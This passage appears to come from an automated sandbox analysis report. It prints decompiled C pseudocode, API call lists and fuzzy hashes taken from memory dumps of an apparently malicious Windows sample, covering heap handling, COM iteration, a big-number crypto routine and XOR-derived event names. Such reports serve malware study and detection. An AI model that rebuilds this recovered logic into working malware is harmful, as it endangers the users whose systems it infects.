• Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$AllocateHeapwcstombs
• String ID: @MxtNxt
• API String ID: 2631933831-1701360479
• Opcode ID: ff493b9a9bc9ea3b41e3bbb3face69a2566a94d79bf7e1f447518029b93cae52
• Instruction ID: 185b7f6b12c29ca4c28a6867283d09ed648555a42a0701490fee6fecee600ba6
• Opcode Fuzzy Hash: ff493b9a9bc9ea3b41e3bbb3face69a2566a94d79bf7e1f447518029b93cae52
• Instruction Fuzzy Hash: A6311DB5900609AFDB11DFA5CC84DFEBBB9EF08354F5048A9E512E3240D7B0AA459F60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%
E02BB462F(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
	void* _v8;
	void* __edi;
	intOrPtr _t18;
	void* _t24;
	void* _t30;
	void* _t36;
	void* _t40;
	intOrPtr _t42;

	_t36 = __edx;
	_t32 = __ecx;
	_push(__ecx);
	_push(__ecx);
	_t42 =  *0x2bbd380; // 0x52f9ba8
	_push(0x800);
	_push(0);
	_push( *0x2bbd270);
	if( *0x2bbd284 >= 5) {
		if(RtlAllocateHeap() == 0) {
			L6:
			_t30 = 8;
			L7:
			if(_t30 != 0) {
				L10:
				 *0x2bbd284 =  *0x2bbd284 + 1;
				L11:
				return _t30;
			}
			_t44 = _a4;
			_t40 = _v8;
			 *_a16 = _a4;
			 *_a20 = E02BB680B(_t44, _t40);
			_t18 = E02BB2274(_t40, _t44);
			if(_t18 != 0) {
				 *_a8 = _t40;
				 *_a12 = _t18;
				if( *0x2bbd284 < 5) {
					 *0x2bbd284 =  *0x2bbd284 & 0x00000000;
				}
				goto L11;
			}
			_t30 = 0xbf;
			E02BB651D();
			HeapFree( *0x2bbd270, 0, _t40);
			goto L10;
		}
		_t24 = E02BBA565(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
		L5:
		_t30 = _t24;
		goto L7;
	}
	if(RtlAllocateHeap() == 0) {
		goto L6;
	}
	_t24 = E02BB70F4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
	goto L5;
}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 02BB4653
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: GetTickCount.KERNEL32 ref: 02BB7108
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB7158
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB7175
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB71A1
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: HeapFree.KERNEL32(00000000,?), ref: 02BB71B3
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB71D4
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: HeapFree.KERNEL32(00000000,?), ref: 02BB71E4
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BB7212
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: GetTickCount.KERNEL32 ref: 02BB7223
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 02BB4671
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000002,02BBA0CB,?,02BBA0CB,00000002,?,?,02BB58BD,?), ref: 02BB46CE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1676223858-1536154274
                                                                                                                                                                                                                                • Opcode ID: 006948da17cf1c79510eb8e97ca3a9c69975724ff2786ea895e8da7c3b390650
                                                                                                                                                                                                                                • Instruction ID: 3ac6d4aef641cf6f74e00781af5bd4092cebc6cd913b7bda6d08a8780e321812
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 006948da17cf1c79510eb8e97ca3a9c69975724ff2786ea895e8da7c3b390650
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F213971A4020AAFDB029F64D894AEA37BDFF48384F1004A6F902D7241DBF5E915DFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 02BB2EE1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB2FC6
                                                                                                                                                                                                                                  • Part of subcall function 02BB6533: SysAllocString.OLEAUT32(02BBC2B0), ref: 02BB6583
                                                                                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02BB3019
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB3028
                                                                                                                                                                                                                                  • Part of subcall function 02BB590A: Sleep.KERNEL32(000001F4), ref: 02BB5952
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3193056040-0
                                                                                                                                                                                                                                • Opcode ID: fc6d2665e22cc13bf0ab4607a309d819be79f7b0c619b74d6b13c2f300ec5f81
                                                                                                                                                                                                                                • Instruction ID: 4b1a144461f5c8ef963c31698ee2cdebe34a81cf624a5ecbd626aec9a793c81e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc6d2665e22cc13bf0ab4607a309d819be79f7b0c619b74d6b13c2f300ec5f81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E516835900609EFDB12CFA8C854AEEB7B6FF88744F1548A9E915DB210DBB1DD05CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                                                                                                			E02BB6533(intOrPtr* __eax) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				WCHAR* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				short _v48;
                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                				short _v64;
                                                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                                                				intOrPtr* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				intOrPtr* _t58;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				short _t67;
                                                                                                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                				intOrPtr* _t75;
                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                                                				intOrPtr* _t83;
                                                                                                                                                                                                                                				intOrPtr* _t87;
                                                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                                                				intOrPtr _t109;
                                                                                                                                                                                                                                				void* _t118;
                                                                                                                                                                                                                                				void* _t122;
                                                                                                                                                                                                                                				void* _t123;
                                                                                                                                                                                                                                				intOrPtr _t130;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t123 = _t122 - 0x3c;
                                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                                				_push(__eax);
                                                                                                                                                                                                                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                				if(_t118 >= 0) {
                                                                                                                                                                                                                                					_t54 = _v8;
                                                                                                                                                                                                                                					_t103 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t5 = _t103 + 0x2bbe038; // 0x3050f485
                                                                                                                                                                                                                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                					_t56 = _v8;
                                                                                                                                                                                                                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                					if(_t118 >= 0) {
                                                                                                                                                                                                                                						__imp__#2(0x2bbc2b0);
                                                                                                                                                                                                                                						_v28 = _t57;
                                                                                                                                                                                                                                						if(_t57 == 0) {
                                                                                                                                                                                                                                							_t118 = 0x8007000e;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t60 = _v32;
                                                                                                                                                                                                                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                							_t87 = __imp__#6;
                                                                                                                                                                                                                                							_t118 = _t61;
                                                                                                                                                                                                                                							if(_t118 >= 0) {
                                                                                                                                                                                                                                								_t63 = _v24;
                                                                                                                                                                                                                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                								if(_t118 >= 0) {
                                                                                                                                                                                                                                									_t130 = _v20;
                                                                                                                                                                                                                                									if(_t130 != 0) {
                                                                                                                                                                                                                                										_t67 = 3;
                                                                                                                                                                                                                                										_v64 = _t67;
                                                                                                                                                                                                                                										_v48 = _t67;
                                                                                                                                                                                                                                										_v56 = 0;
                                                                                                                                                                                                                                										_v40 = 0;
                                                                                                                                                                                                                                										if(_t130 > 0) {
                                                                                                                                                                                                                                											while(1) {
                                                                                                                                                                                                                                												_t68 = _v24;
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												_t123 = _t123;
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                                                                                                                												if(_t118 < 0) {
                                                                                                                                                                                                                                													goto L16;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t70 = _v8;
                                                                                                                                                                                                                                												_t109 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                												_t28 = _t109 + 0x2bbe0bc; // 0x3050f1ff
                                                                                                                                                                                                                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                                                                                                                												if(_t118 >= 0) {
                                                                                                                                                                                                                                													_t75 = _v16;
                                                                                                                                                                                                                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                                                                                                                													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                														_t79 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                														_t33 = _t79 + 0x2bbe078; // 0x76006f
                                                                                                                                                                                                                                														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                															_t83 = _v16;
                                                                                                                                                                                                                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                														 *_t87(_v12);
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                													_t77 = _v16;
                                                                                                                                                                                                                                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t72 = _v8;
                                                                                                                                                                                                                                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                                                                												_v40 = _v40 + 1;
                                                                                                                                                                                                                                												if(_v40 < _v20) {
                                                                                                                                                                                                                                													continue;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												goto L16;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                								_t65 = _v24;
                                                                                                                                                                                                                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *_t87(_v28);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t58 = _v32;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t118;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x02bb660c
                                                                                                                                                                                                                                0x02bb660d
                                                                                                                                                                                                                                0x02bb660f
                                                                                                                                                                                                                                0x02bb6613
                                                                                                                                                                                                                                0x02bb6617
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb661d
                                                                                                                                                                                                                                0x02bb6626
                                                                                                                                                                                                                                0x02bb662c
                                                                                                                                                                                                                                0x02bb6636
                                                                                                                                                                                                                                0x02bb663a
                                                                                                                                                                                                                                0x02bb663c
                                                                                                                                                                                                                                0x02bb6649
                                                                                                                                                                                                                                0x02bb664d
                                                                                                                                                                                                                                0x02bb6655
                                                                                                                                                                                                                                0x02bb665a
                                                                                                                                                                                                                                0x02bb666c
                                                                                                                                                                                                                                0x02bb666e
                                                                                                                                                                                                                                0x02bb6674
                                                                                                                                                                                                                                0x02bb6674
                                                                                                                                                                                                                                0x02bb667d
                                                                                                                                                                                                                                0x02bb667d
                                                                                                                                                                                                                                0x02bb667f
                                                                                                                                                                                                                                0x02bb6685
                                                                                                                                                                                                                                0x02bb6685
                                                                                                                                                                                                                                0x02bb6688
                                                                                                                                                                                                                                0x02bb668e
                                                                                                                                                                                                                                0x02bb6691
                                                                                                                                                                                                                                0x02bb669a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb669a
                                                                                                                                                                                                                                0x02bb65ee
                                                                                                                                                                                                                                0x02bb65e8
                                                                                                                                                                                                                                0x02bb65d1
                                                                                                                                                                                                                                0x02bb66a0
                                                                                                                                                                                                                                0x02bb66a0
                                                                                                                                                                                                                                0x02bb66a6
                                                                                                                                                                                                                                0x02bb66a6
                                                                                                                                                                                                                                0x02bb66ac
                                                                                                                                                                                                                                0x02bb66ac
                                                                                                                                                                                                                                0x02bb66b5
                                                                                                                                                                                                                                0x02bb66bb
                                                                                                                                                                                                                                0x02bb66bb
                                                                                                                                                                                                                                0x02bb6578
                                                                                                                                                                                                                                0x02bb66c4

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(02BBC2B0), ref: 02BB6583
                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02BB6664
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB667D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 02BB66AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1885612795-0
                                                                                                                                                                                                                                • Opcode ID: 94489ea63e64f280d9628c0b98dce790e80c20dc2c33b1c4ddc929cbbaa0ee1b
                                                                                                                                                                                                                                • Instruction ID: f92efad2bca671f7ee292d06057d72768b43bc76e54133658cbe2ff02944be9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94489ea63e64f280d9628c0b98dce790e80c20dc2c33b1c4ddc929cbbaa0ee1b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C514B75D00519EFCB02DFB8C8889EEB7BAFF88704B144599E916EB214D771AD41CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E02BB4EEE(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				void _v156;
                                                                                                                                                                                                                                				void _v428;
                                                                                                                                                                                                                                				void* _t55;
                                                                                                                                                                                                                                				unsigned int _t56;
                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                                                				signed int* _t99;
                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                				signed int _t103;
                                                                                                                                                                                                                                				void* _t107;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t92 = _a12;
                                                                                                                                                                                                                                				_t101 = __eax;
                                                                                                                                                                                                                                				_t55 = E02BB650C(_a16, _t92);
                                                                                                                                                                                                                                				_t79 = _t55;
                                                                                                                                                                                                                                				if(_t79 == 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					return _t55;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                				_t81 = 0;
                                                                                                                                                                                                                                				_t96 = 0x20;
                                                                                                                                                                                                                                				if(_t56 == 0) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                					E02BB5450(_t79,  &_v428);
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02BB7436(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                                                                                                                                					E02BB7436(_t79,  &_v156, _a12, _t97);
                                                                                                                                                                                                                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                                                                                                                                					_t66 = E02BB5450(_t101, 0x2bbd168);
                                                                                                                                                                                                                                					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                					_a8 = _t103;
                                                                                                                                                                                                                                					if(_t103 < 0) {
                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                						E02BB5450(_a16, _a4);
                                                                                                                                                                                                                                						E02BB1072(_t79,  &_v428, _a4, _t97);
                                                                                                                                                                                                                                						memset( &_v428, 0, 0x10c);
                                                                                                                                                                                                                                						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push( *_t99);
                                                                                                                                                                                                                                							L02BBAEC0();
                                                                                                                                                                                                                                							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                							asm("adc edx, esi");
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(_v8 + 1);
                                                                                                                                                                                                                                							_push(_t92);
                                                                                                                                                                                                                                							_push(_t74);
                                                                                                                                                                                                                                							L02BBAEBA();
                                                                                                                                                                                                                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t74 =  *_t99;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                                                                                                                                						_a12 = _t74;
                                                                                                                                                                                                                                						_t76 = E02BB6A23(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                							if( *_t99 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t92 =  &_v156;
                                                                                                                                                                                                                                							if(E02BB67D9(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                							_a12 = _a12 + 1;
                                                                                                                                                                                                                                							_t76 = E02BB5465(_t79,  &_v156, _t106, _t106);
                                                                                                                                                                                                                                							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                							if( *_t99 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_a8 = _a8 - 1;
                                                                                                                                                                                                                                						_t66 = _a12;
                                                                                                                                                                                                                                						_t99 = _t99 - 4;
                                                                                                                                                                                                                                						 *(0x2bbd168 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                					} while (_a8 >= 0);
                                                                                                                                                                                                                                					_t97 = _v12;
                                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(_t81 < _t96) {
                                                                                                                                                                                                                                					_t81 = _t81 + 1;
                                                                                                                                                                                                                                					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                					if(_t56 != 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                0x02bb4f1f
                                                                                                                                                                                                                                0x02bb4f23
                                                                                                                                                                                                                                0x02bb4f24
                                                                                                                                                                                                                                0x02bb4f26
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4f26
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02BB4FA1
                                                                                                                                                                                                                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02BB4FB7
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB5060
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB5076
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3041852380-0
                                                                                                                                                                                                                                • Opcode ID: 72197577a7319a851897e57fa2e4172cc029e7bee15a6b290aa98dcb9923fa8a
                                                                                                                                                                                                                                • Instruction ID: 4e6cfb25b7ca9861bd8043c280715ac93770b2e90fc4b7ba00834ee423a7c08e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72197577a7319a851897e57fa2e4172cc029e7bee15a6b290aa98dcb9923fa8a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F41A171A00219AFDB229F68DC54BFE777AEF45310F4045A9B909A7281DBF0AE44CF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E02BB6C82(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				signed int _t6;
                                                                                                                                                                                                                                				intOrPtr _t8;
                                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                                				short* _t19;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				signed int* _t28;
                                                                                                                                                                                                                                				CHAR* _t30;
                                                                                                                                                                                                                                				long _t31;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t6 =  *0x2bbd2a8; // 0xd448b889
                                                                                                                                                                                                                                				_t32 = _a4;
                                                                                                                                                                                                                                				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                                				_t8 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t3 = _t8 + 0x2bbe876; // 0x61636f4c
                                                                                                                                                                                                                                				_t25 = 0;
                                                                                                                                                                                                                                				_t30 = E02BB6E66(_t3, 1);
                                                                                                                                                                                                                                				if(_t30 != 0) {
                                                                                                                                                                                                                                					_t25 = CreateEventA(0x2bbd2e4, 1, 0, _t30);
                                                                                                                                                                                                                                					E02BB53BB(_t30);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t12 =  *0x2bbd294; // 0x4000000a
                                                                                                                                                                                                                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02BBA1D4() != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t28 = _a8;
                                                                                                                                                                                                                                					if(_t28 != 0) {
                                                                                                                                                                                                                                						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t31 = E02BB74A5(_t32, 0);
                                                                                                                                                                                                                                					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t19 =  *0x2bbd108( *_t32, 0x20);
                                                                                                                                                                                                                                					if(_t19 != 0) {
                                                                                                                                                                                                                                						 *_t19 = 0;
                                                                                                                                                                                                                                						_t19 = _t19 + 2;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t31 = E02BB6ABB(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                                					if(_t31 == 0) {
                                                                                                                                                                                                                                						if(_t25 == 0) {
                                                                                                                                                                                                                                							L22:
                                                                                                                                                                                                                                							return _t31;
                                                                                                                                                                                                                                						}
